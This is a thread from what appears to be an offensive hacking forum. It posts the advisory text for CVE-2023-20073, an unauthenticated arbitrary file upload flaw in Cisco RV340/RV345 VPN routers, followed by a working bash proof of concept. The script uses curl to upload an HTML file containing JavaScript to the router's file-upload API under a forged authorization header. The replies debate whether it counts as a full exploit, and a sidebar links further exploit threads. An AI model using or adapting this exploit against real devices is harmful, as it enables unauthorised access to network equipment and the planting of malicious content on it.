CVE-2023-20073
by Aegis - Sunday September 24, 2023 at 06:15 PM
#1
CVE-2023-20073
Downloading an arbitrary file without authentication (XSS) in VPN routers:
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. 
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Self-Ban | https://pwnforums.st/Forum-Ban-Appeals if you wish to be unbanned in the future.
Reply
#2
good share, was this poc already public or you created from scratch ?
Reply
#3
bro this is just a poc. i've seen it before. come back with the complete exploit code
Reply
#4
(09-26-2023, 07:19 AM)breachy1 Wrote: bro this is just a poc. i've seen it before. come back with the complete exploit code

The whole point of a PoC is to show how it's done in example format. This can be used maliciously with actual knowledge on a combination of things. Mostly expertise in programming, NetSec, programming principles etc. Either way, it's up to you what you do with a PoC.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 73 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 805 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 261 02-06-2026, 07:08 PM
Last Post: hacker0123
  CitrixBleed / CVE-2023-4966 cccp 10 6,797 02-06-2026, 01:36 AM
Last Post: temptest
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 457 02-05-2026, 09:53 AM
Last Post: Sammm89



 Users browsing this thread: 1 Guest(s)